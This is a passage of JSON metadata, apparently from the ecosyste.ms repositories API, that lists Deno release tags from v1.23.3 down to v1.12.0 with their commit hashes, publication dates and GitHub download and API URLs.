ste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHu